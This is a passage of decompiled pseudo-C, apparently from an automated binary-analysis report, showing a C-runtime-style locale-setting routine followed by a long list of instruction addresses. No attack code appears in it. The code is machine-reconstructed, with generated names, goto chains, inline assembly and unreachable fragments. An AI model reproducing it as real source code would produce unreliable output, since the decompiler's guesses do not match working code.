a027b0 call 9f9714 486->489 490 a0264e-a02676 call a027c2 486->490 488->400 488->440 489->487 490->481 496 a02678-a0267f 490->496 496->481
                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                          			E00A02337(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E00A04E1F(0x6a6); // executed
				_t363 = _t249;
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0xa17dd8);
					_push( *0xa17d14);
					E00A02273(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0xa17d14;
					while(1) {
						L2:
						_t254 = E00A0B373(_t428, 0x351, 0xa17dd4);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xa17dd8);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E00A02273(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0xa17d44) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00A0447F(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00A0447F( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E00A0447F( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E00A0447F( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E00A0447F( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E009FCBFC();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0xa44bac; // 0x96877b9b
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E00A02337(_t365, _t424, _t429, _t445, __eflags, _t429); // executed
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E00A01EAD(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E00A0D829(_t445, 0xa17dcc);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0xa17d14;
													_v456 = 1;
													do {
														_t273 = E00A03E58( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0xa17d44;
													} while (_t368 <= 0xa17d44);
													_t365 = _v468 + 2;
													_t274 = E00A0D7D0(_t382, _t365, 0xa17dd4);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E00A0B4B3( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E009FCBFC();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0xa44bac; // 0x96877b9b
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E00A041D0(_t386, _t424) + 0x278;
																_t287 = E00A01EAD(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E00A04E1F(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E00A07440(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E009FCBFC();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E00A06539(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E00A01BCA(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E00A0710A(__eflags, _v712, 1, 0xa17c88, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E009FA5A0( &_v536,  *0xa44d14, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0xa17d10; // 0x9f7faf
																					 *0xa1413c(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0xa44de8;
																						if(_t402 == 0xa44de8) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E00A0447F( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E00A0447F( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E00A0447F( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E00A0447F( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E00A0447F(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E009F8F7D(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E009F9714();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E009F8F7D(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}


















































































































































                                                                                                                                                                          0x00a02337
                                                                                                                                                                          0x00a0233f
                                                                                                                                                                          0x00a02340
                                                                                                                                                                          0x00a02349
                                                                                                                                                                          0x00a0234c
                                                                                                                                                                          0x00a02351
                                                                                                                                                                          0x00a02353
                                                                                                                                                                          0x00a02355
                                                                                                                                                                          0x00a02358
                                                                                                                                                                          0x00a02475
                                                                                                                                                                          0x00a02478
                                                                                                                                                                          0x00a0235e
                                                                                                                                                                          0x00a0235e
                                                                                                                                                                          0x00a0235f
                                                                                                                                                                          0x00a02361
                                                                                                                                                                          0x00a02361
                                                                                                                                                                          0x00a02364
                                                                                                                                                                          0x00a02367
                                                                                                                                                                          0x00a0236a
                                                                                                                                                                          0x00a0236d
                                                                                                                                                                          0x00a0236f
                                                                                                                                                                          0x00a02372
                                                                                                                                                                          0x00a02377
                                                                                                                                                                          0x00a02385
                                                                                                                                                                          0x00a0238f
                                                                                                                                                                          0x00a02392
                                                                                                                                                                          0x00a02395
                                                                                                                                                                          0x00a02395
                                                                                                                                                                          0x00a023a0
                                                                                                                                                                          0x00a023a5
                                                                                                                                                                          0x00a023aa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a023b0
                                                                                                                                                                          0x00a023b3
                                                                                                                                                                          0x00a023b3
                                                                                                                                                                          0x00a023b6
                                                                                                                                                                          0x00a023b8
                                                                                                                                                                          0x00a023bb
                                                                                                                                                                          0x00a023bd
                                                                                                                                                                          0x00a023bd
                                                                                                                                                                          0x00a023bd
                                                                                                                                                                          0x00a023c0
                                                                                                                                                                          0x00a023c0
                                                                                                                                                                          0x00a023c0
                                                                                                                                                                          0x00a023c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a023cb
                                                                                                                                                                          0x00a023e2
                                                                                                                                                                          0x00a023e2
                                                                                                                                                                          0x00a023cd
                                                                                                                                                                          0x00a023cd
                                                                                                                                                                          0x00a023d5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a023d7
                                                                                                                                                                          0x00a023d7
                                                                                                                                                                          0x00a023da
                                                                                                                                                                          0x00a023e0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a023e0
                                                                                                                                                                          0x00a023d5
                                                                                                                                                                          0x00a023eb
                                                                                                                                                                          0x00a023eb
                                                                                                                                                                          0x00a023f0
                                                                                                                                                                          0x00a023f5
                                                                                                                                                                          0x00a023f9
                                                                                                                                                                          0x00a02405
                                                                                                                                                                          0x00a02408
                                                                                                                                                                          0x00a0240b
                                                                                                                                                                          0x00a02415
                                                                                                                                                                          0x00a0241d
                                                                                                                                                                          0x00a02425
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0242b
                                                                                                                                                                          0x00a0242f
                                                                                                                                                                          0x00a0247a
                                                                                                                                                                          0x00a02483
                                                                                                                                                                          0x00a02486
                                                                                                                                                                          0x00a02488
                                                                                                                                                                          0x00a0248c
                                                                                                                                                                          0x00a02490
                                                                                                                                                                          0x00a02495
                                                                                                                                                                          0x00a0249a
                                                                                                                                                                          0x00a02490
                                                                                                                                                                          0x00a0249e
                                                                                                                                                                          0x00a024a0
                                                                                                                                                                          0x00a024a2
                                                                                                                                                                          0x00a024a6
                                                                                                                                                                          0x00a024a7
                                                                                                                                                                          0x00a024ac
                                                                                                                                                                          0x00a024b1
                                                                                                                                                                          0x00a024a7
                                                                                                                                                                          0x00a024b4
                                                                                                                                                                          0x00a024b7
                                                                                                                                                                          0x00a024ba
                                                                                                                                                                          0x00a024bd
                                                                                                                                                                          0x00a024c0
                                                                                                                                                                          0x00a02431
                                                                                                                                                                          0x00a02434
                                                                                                                                                                          0x00a02437
                                                                                                                                                                          0x00a02439
                                                                                                                                                                          0x00a0243d
                                                                                                                                                                          0x00a02441
                                                                                                                                                                          0x00a02446
                                                                                                                                                                          0x00a0244b
                                                                                                                                                                          0x00a02441
                                                                                                                                                                          0x00a02451
                                                                                                                                                                          0x00a02453
                                                                                                                                                                          0x00a02458
                                                                                                                                                                          0x00a0245d
                                                                                                                                                                          0x00a02462
                                                                                                                                                                          0x00a02458
                                                                                                                                                                          0x00a02463
                                                                                                                                                                          0x00a02467
                                                                                                                                                                          0x00a02467
                                                                                                                                                                          0x00a0246a
                                                                                                                                                                          0x00a0246e
                                                                                                                                                                          0x00a02471
                                                                                                                                                                          0x00a02471
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02474
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02425
                                                                                                                                                                          0x00a023e6
                                                                                                                                                                          0x00a023e8
                                                                                                                                                                          0x00a023e8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a023e8
                                                                                                                                                                          0x00a024c7
                                                                                                                                                                          0x00a024c8
                                                                                                                                                                          0x00a024c9
                                                                                                                                                                          0x00a024ca
                                                                                                                                                                          0x00a024cb
                                                                                                                                                                          0x00a024cc
                                                                                                                                                                          0x00a024d1
                                                                                                                                                                          0x00a024d5
                                                                                                                                                                          0x00a024d7
                                                                                                                                                                          0x00a024dd
                                                                                                                                                                          0x00a024e4
                                                                                                                                                                          0x00a024e7
                                                                                                                                                                          0x00a024ea
                                                                                                                                                                          0x00a024eb
                                                                                                                                                                          0x00a024ec
                                                                                                                                                                          0x00a024ef
                                                                                                                                                                          0x00a024f0
                                                                                                                                                                          0x00a024f3
                                                                                                                                                                          0x00a024f9
                                                                                                                                                                          0x00a024fb
                                                                                                                                                                          0x00a02520
                                                                                                                                                                          0x00a0252a
                                                                                                                                                                          0x00a02530
                                                                                                                                                                          0x00a02532
                                                                                                                                                                          0x00a02538
                                                                                                                                                                          0x00a0253a
                                                                                                                                                                          0x00a0279a
                                                                                                                                                                          0x00a0279b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02540
                                                                                                                                                                          0x00a02540
                                                                                                                                                                          0x00a02544
                                                                                                                                                                          0x00a026b2
                                                                                                                                                                          0x00a026cf
                                                                                                                                                                          0x00a026d4
                                                                                                                                                                          0x00a026d7
                                                                                                                                                                          0x00a026d9
                                                                                                                                                                          0x00a026df
                                                                                                                                                                          0x00a026df
                                                                                                                                                                          0x00a026e1
                                                                                                                                                                          0x00a026e4
                                                                                                                                                                          0x00a026e6
                                                                                                                                                                          0x00a026ec
                                                                                                                                                                          0x00a026ec
                                                                                                                                                                          0x00a026ee
                                                                                                                                                                          0x00a02775
                                                                                                                                                                          0x00a02775
                                                                                                                                                                          0x00a026f4
                                                                                                                                                                          0x00a026f4
                                                                                                                                                                          0x00a026f6
                                                                                                                                                                          0x00a026fc
                                                                                                                                                                          0x00a026ff
                                                                                                                                                                          0x00a02702
                                                                                                                                                                          0x00a02708
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0270a
                                                                                                                                                                          0x00a0270e
                                                                                                                                                                          0x00a02737
                                                                                                                                                                          0x00a02737
                                                                                                                                                                          0x00a02739
                                                                                                                                                                          0x00a02710
                                                                                                                                                                          0x00a02710
                                                                                                                                                                          0x00a02714
                                                                                                                                                                          0x00a02718
                                                                                                                                                                          0x00a0271f
                                                                                                                                                                          0x00a02725
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02727
                                                                                                                                                                          0x00a02727
                                                                                                                                                                          0x00a0272a
                                                                                                                                                                          0x00a0272d
                                                                                                                                                                          0x00a02735
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02735
                                                                                                                                                                          0x00a02725
                                                                                                                                                                          0x00a02744
                                                                                                                                                                          0x00a02744
                                                                                                                                                                          0x00a02746
                                                                                                                                                                          0x00a02774
                                                                                                                                                                          0x00a02774
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02748
                                                                                                                                                                          0x00a02748
                                                                                                                                                                          0x00a0274e
                                                                                                                                                                          0x00a0274f
                                                                                                                                                                          0x00a02750
                                                                                                                                                                          0x00a02751
                                                                                                                                                                          0x00a02756
                                                                                                                                                                          0x00a0275c
                                                                                                                                                                          0x00a0275f
                                                                                                                                                                          0x00a02761
                                                                                                                                                                          0x00a02768
                                                                                                                                                                          0x00a0276a
                                                                                                                                                                          0x00a0276c
                                                                                                                                                                          0x00a02763
                                                                                                                                                                          0x00a02763
                                                                                                                                                                          0x00a02764
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02764
                                                                                                                                                                          0x00a02761
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02746
                                                                                                                                                                          0x00a0273d
                                                                                                                                                                          0x00a0273f
                                                                                                                                                                          0x00a02742
                                                                                                                                                                          0x00a02742
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02742
                                                                                                                                                                          0x00a0277b
                                                                                                                                                                          0x00a0277b
                                                                                                                                                                          0x00a0277c
                                                                                                                                                                          0x00a0277f
                                                                                                                                                                          0x00a02785
                                                                                                                                                                          0x00a02785
                                                                                                                                                                          0x00a0278e
                                                                                                                                                                          0x00a02790
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02792
                                                                                                                                                                          0x00a02792
                                                                                                                                                                          0x00a02794
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a02796
                                                                                                                                                                          0x00a02796
